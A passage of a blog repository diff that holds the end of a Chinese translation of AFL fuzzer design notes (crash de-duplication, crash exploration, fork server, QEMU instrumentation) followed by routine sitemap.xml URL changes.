SQL,XML。一些生成SQL语句的例子已经在之前提到的博客中给出了。有趣的是，AFL的插桩也允许fuzzer自动地隔离(isolate)已经在输入文件中出现过的句法(syntax)符号(tokens)。 8) 崩溃去重（De-duping crashes）崩溃去重是fuzzing工具里很重要的问题之一。很多naive的解决方式都会有这样的问题：如果这个错误发生在一个普通的库函数中(如say, strcmp, strcpy)，只关注出错地址(faulting address)的话，那么可能导致一些完全不相关的问题被分在一类(clustered together)。如果错误发生在一些不同的、可能递归的代码路径中，那么校验和(checksumming)调用栈回溯(call stack backtraces)时可能导致crash count inflation(通胀)。 afl-fuzz的解决方案认为满足一下两个条件，那么这个crash就是唯一的(unique)：12- The crash trace includes a tuple not seen in any of the previous crashes,这个crash的路径包括一个之前crash从未见到过的tuple。- The crash trace is missing a tuple that was always present in earlier faults.这个crash的路径不包含一个总在之前crash中出现的tuple。 这种方式一开始容易受到count inflation的影响，但实验表明其有很强的自我限制效果。和执行路径分析一样，这种 崩溃去重 的方式是afl-fuzz的基石(cornerstone)。 9) 崩溃调查(Investigating crashes)不同的crash的可用性(exploitability)是不同的。afl-fuzz提供一个crash的探索模式(exploration mode)来解决这个问题。对一个已知的出错测试用例，它被fuzz的方式和正常fuzz的操作没什么不同，但是有一个限制能让任何non-crashing 的变异(mutations)会被丢弃(thrown away)。这种方法的意义在以下链接中会进一步讨论：afl-fuzz-crash-exploration-mode这种方法利用instrumentation的反馈，探索crash程序的状态，从而进一步通过歧义性的失败条件，找到了最新发现的input。对于crashes来说，值得注意的是和正常的队列条目对比，导致crash的input没有被去掉，为了和它们的父条目（队列中没有导致crash的条目）对比，它们被保存下来，这就是说afl-tmin可以被用来随意缩减它们。 10) The fork server为了提升性能，afl-fuzz使用了一个”fork server”，fuzz的进程只进行一次execve(), 连接(linking), 库初始化(libc initialization)。fuzz进程通过copy-on-write(写时拷贝技术)从已停止的fuzz进程中clone下来。实现细节在以下链接中：fuzzing-binaries-without-execvefork server被集成在了instrumentation的程序下，在第一个instrument函数执行时，fork server就停止并等待afl-fuzz的命令。对于需要快速发包的测试，fork server可以提升1.5到2倍的性能。 11) 并行机制实现并行的机制是，定期检查不同cpu core或不同机器产生的队列，然后有选择性的把队列中的条目放到test cases中。详见： parallel_fuzzing.txt. 12）二进制instrumentationAFL-Fuzz对二进制黑盒目标程序的instrumentation是通过QEMU的“user emulation”模式实现的。这样我们就可以允许跨架构的运行，比如ARM binaries运行在X86的架构上。QEMU使用basic blocks作为翻译单元，利用QEMU做instrumentation，再使用一个和编译期instrumentation类似的guided fuzz的模型。1234567if (block_address &gt; elf_text_start &amp;&amp; block_address &lt; elf_text_end) &#123; cur_location = (block_address &gt;&gt; 4) ^ (block_address &lt;&lt; 8); shared_mem[cur_location ^ prev_location]++; prev_location = cur_location &gt;&gt; 1;&#125; 像QEMU, DynamoRIO, and PIN这样的二进制翻译器，启动是很慢的。QEMU mode同样使用了一个fork server，和编译期一样，通过把一个已经初始化好的进程镜像，直接拷贝到新的进程中。当然第一次翻译一个新的basic block还是有必要的延迟，为了解决这个问题AFL fork server在emulator和父进程之间提供了一个频道。这个频道用来通知父进程新添加的blocks的地址，之后吧这些blocks放到一个缓存中，以便直接复制到将来的子进程中。这样优化之后，QEMU模式对目标程序造成2-5倍的减速，相比之下，PIN造成100倍以上的减速。 13）afl-analyze工具文件格式分析器是最小化算法的简单扩展前面讨论过; 该工具执行一系列步行字节翻转，然后在输入文件中注释字节运行，而不是尝试删除无操作块。]]></content>
       <categories>
         <category>二进制</category>
       </categories>
diff --git a/sitemap.xml b/sitemap.xml
index a3de817c..cb8cc04d 100644
--- a/sitemap.xml
+++ b/sitemap.xml
@@ -1,6 +1,20 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
   
+  <url>
+    <loc>https://cool-y.github.io/2019/07/10/x86basic/</loc>
+    
+    <lastmod>2019-10-25T13:07:23.257Z</lastmod>
+    
+  </url>
+  
+  <url>
+    <loc>https://cool-y.github.io/2019/07/16/linux-pwn-32/</loc>
+    
+    <lastmod>2019-10-25T13:06:26.899Z</lastmod>
+    
+  </url>
+  
   <url>
     <loc>https://cool-y.github.io/hack%E4%B9%8B%E5%A4%96/index.html</loc>
     
@@ -15,13 +29,6 @@
     
   </url>
   
-  <url>
-    <loc>https://cool-y.github.io/2019/07/10/x86basic/</loc>
-    
-    <lastmod>2019-07-26T01:00:43.904Z</lastmod>
-    
-  </url>
-  
   <url>
     <loc>https://cool-y.github.io/2019/07/25/Debug-a-router-firmware/</loc>
     
@@ -50,13 +57,6 @@
     
   </url>
   
-  <url>
-    <loc>https://cool-y.github.io/2019/07/16/linux-pwn-32/</loc>
-    
-    <lastmod>2019-07-16T09:16:44.729Z</lastmod>
-    
-  </url>
-  
   <url>
     <loc>https://cool-y.github.io/2019/04/21/XIAOMI-UPnP/</loc>
     
@@ -121,7 +121,7 @@
   </url>
   
   <url>
-    <loc>https://cool-y.github.io/tags/index.html</loc>
+    <loc>https://cool-y.github.io/googleacf4df440b4becc4.html</loc>
     
     <lastmod>2019-04-15T07:35:38.085Z</lastmod>
     
@@ -135,7 +135,7 @@
   </url>
   
   <url>
-    <loc>https://cool-y.github.io/googleacf4df440b4becc4.html</loc>
+    <loc>https://cool-y.github.io/tags/index.html</loc>
     
     <lastmod>2019-04-15T07:35:38.085Z</lastmod>
     
@@ -149,14 +149,14 @@
   </url>
   
   <url>
-    <loc>https://cool-y.github.io/about/index.html</loc>
+    <loc>https://cool-y.github.io/2018/12/23/%E5%9F%BA%E4%BA%8E%E8%A7%84%E5%88%99%E5%BC%95%E6%93%8E%E5%8F%91%E7%8E%B0IOT%E8%AE%BE%E5%A4%87/</loc>
     
     <lastmod>2019-04-15T07:35:38.083Z</lastmod>
     
   </url>
   
   <url>
-    <loc>https://cool-y.github.io/2018/12/23/%E5%9F%BA%E4%BA%8E%E8%A7%84%E5%88%99%E5%BC%95%E6%93%8E%E5%8F%91%E7%8E%B0IOT%E8%AE%BE%E5%A4%87/</loc>
+    <loc>https://cool-y.github.io/about/index.html</loc>
     
     <lastmod>2019-04-15T07:35:38.083Z</lastmod>